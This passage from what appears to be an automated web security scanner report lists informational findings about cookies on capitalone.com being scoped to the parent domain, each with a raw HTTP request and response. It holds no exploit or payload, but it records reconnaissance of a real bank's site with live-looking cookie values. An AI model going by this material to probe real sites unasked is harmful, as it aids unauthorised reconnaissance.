Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 32067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.95. http://www.capitalone.com/directbanking/online-savings-accounts/high-yield-money-market-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/high-yield-money-market-account/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:08 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.96. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/interestplus-online-savings-account/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:07 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<
...[SNIP]...

10.97. http://www.capitalone.com/directbanking/online-savings-accounts/rewards-money-market-account/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/rewards-money-market-account/index.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:13 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<
...[SNIP]...

10.98. http://www.capitalone.com/financialeducation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /financialeducation/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 27487

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan
...[SNIP]...

10.99. http://www.capitalone.com/financialeducation/creditcardact/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /financialeducation/creditcardact/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /financialeducation/creditcardact/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:39 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 24653

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi
...[SNIP]...

10.100. http://www.capitalone.com/fraud/prevention/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /fraud/prevention/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fraud/prevention/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 37509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

10.101. http://www.capitalone.com/loans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /loans/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 22518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One offer
...[SNIP]...

10.102. http://www.capitalone.com/onlinebanking/overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /onlinebanking/overview.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlinebanking/overview.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:36 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23649

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi
...[SNIP]...

10.103. http://www.capitalone.com/personalloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /personalloans/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalloans/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:27 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 21748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Personal Loans: A
...[SNIP]...

10.104. http://www.capitalone.com/protection/privacy/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /protection/privacy/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /protection/privacy/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:36 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

10.105. http://www.capitalone.com/protection/security/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /protection/security/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /protection/security/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

10.106. http://www.capitalone.com/redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /redirect.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:11:48 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/



10.107. http://www.capitalone.com/rewards/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /rewards/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rewards/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:50 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi
...[SNIP]...

10.108. http://www.capitalone.com/rewards/service-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /rewards/service-login.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rewards/service-login.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
